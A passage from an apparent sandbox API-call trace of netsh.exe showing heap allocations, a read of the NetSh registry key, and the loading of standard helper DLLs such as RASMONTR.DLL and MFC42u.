Size=0x8) returned 0x5067d8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5067e8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5067f8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506808 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506818 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506828 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506838 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506848 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506858 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506868 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506878 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506888 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506898 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5068a8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5068b8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5068c8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5068d8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5068e8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5068f8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506908 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506918 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506928 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506938 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506948 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506958 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506968 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506978 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5069a8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5069b8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5069c8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5069d8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5069e8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5069f8 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a08 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a18 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.087] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a28 [0082.087] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a38 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a48 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a58 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a68 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a78 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a88 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506a98 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506aa8 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506ab8 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506ac8 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506ad8 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506ae8 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506af8 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b08 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b18 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b28 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.088] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b38 [0082.088] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b48 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b58 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b68 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b78 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b88 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506b98 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506ba8 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506bb8 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506bc8 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506bd8 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506be8 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506bf8 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c08 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c18 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c28 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c38 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c48 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c58 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c68 [0082.089] GetProcessHeap () returned 0x4f0000 [0082.089] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c78 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c88 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506c98 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506ca8 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506cb8 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506cc8 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506cd8 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506ce8 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506cf8 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d08 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d18 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d28 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d38 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d48 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d58 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d68 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506d78 [0082.090] GetProcessHeap () returned 0x4f0000 [0082.090] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506da8 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506db8 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506dc8 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506dd8 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506de8 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506df8 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506e08 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506e18 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506e28 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506e38 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506e48 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506e58 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506e68 [0082.091] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0082.091] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x507190 [0082.091] GetProcessHeap () returned 0x4f0000 [0082.091] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2) returned 0x506e78 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x5071b0 [0082.092] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x5071d0 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x90) returned 0x507220 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5071d0 | out: hHeap=0x4f0000) returned 1 [0082.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x247ab4 | out: phkResult=0x247ab4*=0xac) returned 0x0 [0082.092] RegQueryInfoKeyW (in: hKey=0xac, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x247aac, lpcbMaxValueNameLen=0x247aa0, lpcbMaxValueLen=0x247aa4, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x247aac*=0x12, lpcbMaxValueNameLen=0x247aa0, lpcbMaxValueLen=0x247aa4, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x16) returned 0x5071d0 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.092] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x23) returned 0x5071f0 [0082.092] RegEnumValueW (in: hKey=0xac, dwIndex=0x0, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="4", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0082.092] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0082.092] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0082.092] GetProcessHeap () returned 0x4f0000 [0082.093] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x28) returned 0x5072b8 [0082.093] GetProcessHeap () returned 0x4f0000 [0082.093] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x506e88 [0082.093] GetProcessHeap () returned 0x4f0000 [0082.093] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1a) returned 0x5051e0 [0082.093] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0082.093] GetProcessHeap () returned 0x4f0000 [0082.093] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x507190 | out: hHeap=0x4f0000) returned 1 [0082.093] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x74650000 [0089.330] LoadLibraryA (lpLibFileName=0x71d80bac) returned 0x76f90000 [0089.330] GetVersion () returned 0x1db10106 [0089.330] SetErrorMode (uMode=0x0) returned 0x0 [0089.330] SetErrorMode (uMode=0x8001) returned 0x0 [0089.331] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x509388 [0089.331] GetVersion () returned 0x1db10106 [0089.331] GlobalLock (hMem=0x430004) returned 0x507638 [0089.331] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x509388 [0089.332] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x508b48 [0089.332] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x506e98 [0089.332] malloc (_Size=0x80) returned 0x7c3ef8 [0089.332] __dllonexit () returned 0x71d947bb [0089.332] __dllonexit () returned 0x71d947ca [0089.332] __dllonexit () returned 0x71d947d9 [0089.332] __dllonexit () returned 0x71d947e8 [0089.333] __dllonexit () returned 0x71d949d1 [0089.333] __dllonexit () returned 0x71d94666 [0089.333] __dllonexit () returned 0x71d94a8d [0089.333] __dllonexit () returned 0x71d946cb [0089.333] __dllonexit () returned 0x71d94707 [0089.333] __dllonexit () returned 0x71d94716 [0089.333] __dllonexit () returned 0x71d94725 [0089.333] __dllonexit () returned 0x71d94b36 [0089.334] __dllonexit () returned 0x71d946da [0089.334] __dllonexit () returned 0x71d94833 [0089.334] __dllonexit () returned 0x71d946e9 [0089.334] __dllonexit () returned 0x71d94734 [0089.334] __dllonexit () returned 0x71d94743 [0089.334] __dllonexit () returned 0x71d94752 [0089.334] __dllonexit () returned 0x71d94761 [0089.334] __dllonexit () returned 0x71d94770 [0089.334] __dllonexit () returned 0x71d9477f [0089.334] __dllonexit () returned 0x71d9478e [0089.335] __dllonexit () returned 0x71d9479d [0089.335] __dllonexit () returned 0x71d94cae [0089.335] __dllonexit () returned 0x71d948e2 [0089.335] __dllonexit () returned 0x71d94999 [0089.335] __dllonexit () returned 0x71d949b5 [0089.337] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0089.338] __dllonexit () returned 0x71d947f7 [0089.338] __dllonexit () returned 0x71d94806 [0089.338] __dllonexit () returned 0x71d94815 [0089.338] __dllonexit () returned 0x71d94824 [0089.338] GetVersion () returned 0x1db10106 [0089.338] GetVersion () returned 0x1db10106 [0089.338] GetVersion () returned 0x1db10106 [0089.338] __dllonexit () returned 0x71d94d35 [0089.339] __dllonexit () returned 0x71d945d2 [0089.339] __dllonexit () returned 0x71d946f8 [0089.339] __dllonexit () returned 0x71d94ae3 [0089.339] __dllonexit () returned 0x71d94aff [0089.339] __dllonexit () returned 0x71d945ec [0089.339] GetVersion () returned 0x1db10106 [0089.339] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0089.339] GetSystemMetrics (nIndex=11) returned 32 [0089.339] GetSystemMetrics (nIndex=12) returned 32 [0089.339] GetSystemMetrics (nIndex=2) returned 17 [0089.339] GetSystemMetrics (nIndex=3) returned 17 [0089.339] GetDC (hWnd=0x0) returned 0xb010a18 [0089.344] GetDeviceCaps (hdc=0xb010a18, index=88) returned 96 [0089.344] GetDeviceCaps (hdc=0xb010a18, index=90) returned 96 [0089.344] ReleaseDC (hWnd=0x0, hDC=0xb010a18) returned 1 [0089.381] GetSysColor (nIndex=15) returned 0xf0f0f0 [0089.381] GetSysColor (nIndex=16) returned 0xa0a0a0 [0089.381] GetSysColor (nIndex=20) returned 0xffffff [0089.381] GetSysColor (nIndex=18) returned 0x0 [0089.381] GetSysColor (nIndex=6) returned 0x646464 [0089.381] GetSysColorBrush (nIndex=15) returned 0x1100059 [0089.381] GetSysColorBrush (nIndex=6) returned 0x1100061 [0089.381] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0089.383] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0089.563] __dllonexit () returned 0x71d94b1b [0089.563] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0089.563] __dllonexit () returned 0x71d945fc [0089.563] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0089.563] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0089.563] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0089.563] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0089.563] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0089.563] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0089.564] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0089.564] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0089.564] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0089.564] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0089.564] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0089.564] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0089.564] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0089.564] __dllonexit () returned 0x71d94842 [0089.564] __dllonexit () returned 0x71d94851 [0089.564] __dllonexit () returned 0x71d94860 [0089.564] __dllonexit () returned 0x71d9486f [0089.565] __dllonexit () returned 0x71d9487e [0089.565] GetCursorPos (in: lpPoint=0x71e70418 | out: lpPoint=0x71e70418*(x=1055, y=491)) returned 1 [0091.152] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x507478 [0091.152] LocalReAlloc (hMem=0x506e98, uBytes=0xc, uFlags=0x2) returned 0x507190 [0091.152] GetCurrentThread () returned 0xfffffffe [0091.152] GetCurrentThreadId () returned 0x64 [0091.152] __dllonexit () returned 0x71d947ac [0091.152] SetErrorMode (uMode=0x0) returned 0x8001 [0091.152] SetErrorMode (uMode=0x8001) returned 0x0 [0091.152] GetModuleFileNameW (in: hModule=0x71d70000, lpFilename=0x24715c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\MFC42u.dll" (normalized: "c:\\windows\\syswow64\\mfc42u.dll")) returned 0x1e [0091.152] wcscpy_s (in: _Destination=0x247364, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0091.153] FindResourceW (hModule=0x71d70000, lpName=0xe01, lpType=0x6) returned 0x1209b0 [0091.246] LoadStringW (in: hInstance=0x71d70000, uID=0xe000, lpBuffer=0x246f5c, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0091.249] wcscpy_s (in: _Destination=0x247190, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0091.249] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0091.254] malloc (_Size=0x40) returned 0x7c3f78 [0091.254] LocalAlloc (uFlags=0x40, uBytes=0x2090) returned 0x509508 [0091.258] GetSystemDirectoryA (in: lpBuffer=0x2475a8, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.258] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0091.258] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0091.796] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0091.796] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0091.796] GetProcAddress (hModule=0x74650000, lpProcName="InitHelperDll") returned 0x74666cb9 [0091.796] InitHelperDll () returned 0x0 [0091.797] RegisterHelper () returned 0x0 [0091.797] GetProcessHeap () returned 0x4f0000 [0091.797] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd8) returned 0x50bda0 [0091.797] GetProcessHeap () returned 0x4f0000 [0091.797] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x507220 | out: hHeap=0x4f0000) returned 1 [0091.797] RegisterHelper () returned 0x0 [0091.797] GetProcessHeap () returned 0x4f0000 [0091.797] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x120) returned 0x50be80 [0091.797] GetProcessHeap () returned 0x4f0000 [0091.797] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50bda0 | out: hHeap=0x4f0000) returned 1 [0091.797] RegisterHelper () returned 0x0 [0091.797] GetProcessHeap () returned 0x4f0000 [0091.797] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x168) returned 0x50bfa8 [0091.797] GetProcessHeap () returned 0x4f0000 [0091.797] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50be80 | out: hHeap=0x4f0000) returned 1 [0091.797] RegisterHelper () returned 0x0 [0091.797] GetProcessHeap () returned 0x4f0000 [0091.797] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1b0) returned 0x50bda0 [0091.798] GetProcessHeap () returned 0x4f0000 [0091.798] HeapFree (in: 